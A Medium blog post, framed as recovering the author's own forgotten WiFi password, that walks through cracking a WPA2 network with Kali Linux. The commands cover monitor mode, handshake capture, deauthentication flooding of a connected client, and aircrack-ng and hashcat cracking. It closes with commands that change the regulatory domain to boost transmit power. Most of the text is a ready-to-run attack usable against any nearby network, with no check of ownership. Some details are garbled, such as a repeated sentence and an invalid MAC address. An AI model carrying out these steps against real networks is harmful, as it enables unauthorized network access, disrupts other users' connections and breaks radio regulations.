I forgot my WIFI password

Oh, it’s no longer a problem…

I want to show how I decrypt my WIFI password.The essential tool in wireless security testing is the wireless adapter. It must support packet injection into a wireless stream and monitoring mode. Usually, standard adapters support monitoring mode, and you will be able to run airodump-ng command and listen to wireless traffic around your self. But injection mode is required to run aireplay-ng command. A list of supported adapters is here [1]

I used only these tools below:

  • Laptop with GPU
  • Alfa AWUS036AC adapter
  • Latest Kali Linux

My virtual machine with Kali Linux [2] is ready. I need to make sure my WIFI adapter is attached to the virtual machine.

On “ Virtualbox” toolbar:

Settings > Ports > USB > + > USB Realtek adapter

Once the operating system has loaded, default user root and password toor On a new terminal window I have to check for available WIFI devices:

iwconfig

I see a device with a name wlan0.

# Optionally, but it’s not necessary to upgrade package.
sudo apt update && apt upgrade -y

By default, the latest Kali has “Hashcat”, “Aircrack-ng” and other tools preinstalled. But it’s possible to use these tools with Ubuntu or another distro.

# Optionally, if OS is not Kali
sudo apt install hashcat aircrack-ng -y

My Alfa adapter is capable of sniffing and injecting packets. I need to switch the adapter into the monitoring mode. Usually, WIFI adapters are recognized as wlan0and then it goes into monitoring mode wlan0mon

airmon-ng check kill && airmon-ng start wlan0

I have to scan the wireless network area and get more technical details about my access point.

airodump-ng wlan0mon

From the output, I see the WIFI signal is strong, packets are increasing, and the channel number is 5. My goal is to catch only my handshake. I have to specify the arguments and start capturing packets into a file.

airodump-ng wlan0mon --channel 5 --bssid 55:CC:BB:11:LT:12 --write mywifi --force

It’s essential to have at least one device connected to WIFI station. During the full handshake phase, a master key is exchanging in between client and WIFI station. That can achieve with the client’s de-authentication method. On a new terminal, I ran the command with additional arguments for client and access point and the number of de-authentication attempts.

aireplay-ng wlan0mon -a 55:CC:BB:11:LT:12 -c 55:44:44:68:73:65 -0 99

I am waiting for a message WPA handshake: 00:11:22:33:44:55 in the top right-hand corner of the screen. (terminal with airodump-ng ) after a few moments, it appears on my screen.

I have two option:

I can use a list of the most common passwords — aircrack-ng with the dictionary attack.

aircrack-ng -a 2 -b 55:CC:BB:11:LT:12 -w wordlist.txt mywifi-01.cap

I can use a list of the most common passwords — aircrack-ng with the dictionary attack. I can use a list of the most common passwords — aircrack-ng with the dictionary attack.

aircrack-ng -j hashcat mywifi-01.cap
# And it's time for hashcat :)
sudo hashcat -m 2500 -a 3 hashcat.hccapx ?d?d?d?d?d?d?d?d --potfile-path wpa2.pot

Results hash, SSID name, and my password printed in the terminal and saved in file with a name “wpa2.pot”

One more thing with this configuration you will need increaser tx power up to 1W

Tested on a AWUS036H

ifconfig wlan0 down
iw reg set GY
ifconfig wlan0 up
ifconfig wlan0
#1 https://null-byte.wonderhowto.com/how-to/check-if-your-wireless-network-adapter-supports-monitor-mode-packet-injection-0191221/
#2 https://medium.com/@tomas_savenas/kali-2018-4-and-metasploit-framework-5-0-73190afc9d96

--

--

--

Kibernetinio saugumo entuziastas; Aktyviausias Lietuvis TryHackMe platformoje; Inovacijų valdymo ir Antreprenerystės Magistrantas @ KTU

Love podcasts or audiobooks? Learn on the go with our new app.

Stealing Bob’s idea

Day 12 Internet Security Controls #100DaysofHacking

{UPDATE} Adorable Cats glow connect Hack Free Resources Generator

MDT(Measurable Data Token) Weekly Report: 2020 September — Week 4

The Privacy Diaries: Cambridge Analytica and the Facebook Security Breach

The ONLY correct way to handle users changing their email address

Fascinating VPS for GSA Search Engine Ranker

The GDPR Is Here… And This Is a Nightmare Employee Demand Letter

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Tomas Savenas

Tomas Savenas

Kibernetinio saugumo entuziastas; Aktyviausias Lietuvis TryHackMe platformoje; Inovacijų valdymo ir Antreprenerystės Magistrantas @ KTU

More from Medium

Firefox vs Chrome: Which web browser reigns supreme?

Evolution of ICT Applications

All about TRANSISTORS!!!

HOW LOSING ONE MOBILE DEVICE PUTS YOUR WHOLE COMPANY AT RISK